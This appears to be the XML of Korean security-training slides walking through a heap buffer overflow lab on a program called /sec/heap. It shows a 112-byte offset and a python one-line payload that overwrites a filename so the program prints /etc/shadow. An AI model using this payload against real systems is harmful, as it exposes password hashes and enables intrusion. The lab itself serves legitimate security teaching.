            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="그룹 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B2AB5BF-8041-499A-A7F3-92EF61AFA96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EB34B6-6C69-4531-A55D-CE4F93D989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DD3723E-EBE5-46F9-BBF7-C1BB198612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531D6E2-6525-432C-BC29-B104F888CAC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179903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vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/heap</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/sec/goodfile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>cat goodfile</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/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>블록과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>filename </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>블록 간의 거리가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x70(=112) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>바이트임을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{571A0F24-991F-415E-A73C-B4EAAC47731D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="505350" y="1308062"/>
            <a:ext cx="3931920" cy="678180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E16244EA-4DD3-4DB4-82AB-E12B21602F05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="505350" y="2572320"/>
            <a:ext cx="4954143" cy="2751582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 96">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CEE197C-F394-412F-8A5A-427406107DD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="2315" t="7386"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="505350" y="5778500"/>
            <a:ext cx="3059320" cy="501060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE075564-BEE4-4DC3-AF46-CA3441663962}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="927" t="2533" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6303893" y="852446"/>
            <a:ext cx="3729355" cy="1262591"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{922514E9-35C9-4437-B2C6-2C1F069FC0E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1730220895"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6303893" y="2416397"/>
          <a:ext cx="4932807" cy="2686495"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="58839612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80712301"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2192020">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114587"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57345" name="_x570528760">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D34F5E5-1CDA-4753-B23F-F4B742DB72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8727" y="3007517"/>
            <a:ext cx="4783138" cy="188118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D8EF467-838B-401E-8C44-EF9C0969A912}"/>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887E6CE-FA27-4E84-A8B5-629D20E674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EEB57CA6-41C8-4B86-8288-641600675A0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7E42FEDF-AC64-48DC-8741-0850E5A3D2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020646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err="1"/>
              <a:t>힙</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 취약점을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>수정할 수 있음을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$(python -c 'print "A"*112+"B"') &gt; 1.txt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위의 실행 결과 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ cat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B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>라는 파일을 열 수 없었음을 확인</a:t>
            </a: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/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용이 출력되도록 공격 수행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$(python -c 'print "A"*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>112+"/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow"') &gt; 2.txt</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD377966-9EB2-46A2-8812-AD29643EC5AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="699" t="323" r="721" b="158"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="504826" y="862012"/>
            <a:ext cx="4852987" cy="2705101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A19AB127-0D1E-49DE-AA80-E2C09252F5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3264585511"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="504826" y="3632427"/>
          <a:ext cx="4932807" cy="2784276"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1563084074"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="255215">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49791167"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="252906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시작 주소로부터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개의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문자가 복사되며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시작 주소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복사된다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5568446"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59393" name="_x603817952">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{266AA15A-B8BA-445A-9A33-16961264F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97" y="4473906"/>
            <a:ext cx="4593352" cy="1806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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76E22925-E979-45D6-8626-2DA803E7AD52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="830" t="1826" r="101" b="451"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6311741" y="862012"/>
            <a:ext cx="4905375" cy="1019175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 105">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A9FE55-DBD5-4F0D-A63F-B2351D7BBB77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6311741" y="2811778"/>
            <a:ext cx="4934204" cy="2746629"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="그룹 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44DC8520-7C1E-43E7-84E9-467C287FDD7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3523E35-2AE8-4E01-8F25-6D62F827C3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755DA178-FFF2-4F20-95AD-779D82BC8AD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25D482AD-1BDB-4B00-840E-53F5B98BEC9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4476255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위의 공격 결과 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ cat 2.txt</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7321A60-9A8B-4DCF-B6BE-E0B5E85C5327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3693238139"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="513016" y="490569"/>
          <a:ext cx="5049584" cy="2686495"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5049584">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="341763896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73645710"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="22031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509503"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60417" name="_x609432040">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8A00DFC-BC0A-404C-A5D1-E832A2A5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10" y="1092518"/>
            <a:ext cx="4811713" cy="1892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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{696B1E8A-1EFD-4FFC-BD3E-A7127DA4DFDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="513016" y="3608229"/>
            <a:ext cx="4992116" cy="2759202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58C682B9-F1E2-456F-BB10-FF556080591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파일명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/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용이 출력된 파일 이름 입력</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>위의 예제에서는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2.txt)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="그룹 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A5316DD-2CD5-490B-83B5-C7C01B0202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9825A1-062A-40CE-B920-CD7749C7A75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D71437C5-6CDA-4FB6-8C80-D0BAD3A08F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2EADCCBE-7BBA-4A27-B14F-CB5D54F4E41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443376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보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71EB15F0-8F52-4084-8228-4234399B10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/sec/heap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없는 파일의 내용이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ACA32BEB-9045-401B-B976-A8DE580FE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4C69DC5-6D46-4110-B092-F87162F11C2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E250E706-7320-4890-B2A5-9F511E31CF36}"/>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6F75AFA-6CA9-432C-B149-D4CF8BED7C7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2F042198-8D3B-42BA-9AB0-F321EFE2DD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527DCE4-1233-4F8B-B02D-73786CA1D8E6}"/>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B0414104-8B9C-4CB0-900B-F84D0564BA23}"/>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11781417-D03F-4E91-B9D9-1AF2D709571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23087AE6-366E-41AB-BDDA-0EE45619FF9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78351B86-FFEB-4E07-95F8-5CDDE591EF0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5441750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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>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/sec/heap </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>l heap</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648275"/>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09">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C217BE02-C249-4B5F-B814-9FDE58ECBC3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1699" t="2896"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="530224" y="1327150"/>
            <a:ext cx="3932555" cy="695536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A268674-ACB5-47FC-8FAB-D5A054A14CE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="1145" t="7026"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="530224" y="2770129"/>
            <a:ext cx="3977321" cy="658871"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F01A300-EBE6-4B42-B0BD-D37242AA4775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2758136661"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6317137" y="498209"/>
          <a:ext cx="4932807" cy="4393375"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="160444018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3504514"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="392925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활성화로는 대응이 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이유는 다음과 같이 두 버퍼들 간의 거리는 일정하게 유지되기 때문이다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311618"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61441" name="_x563165400">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
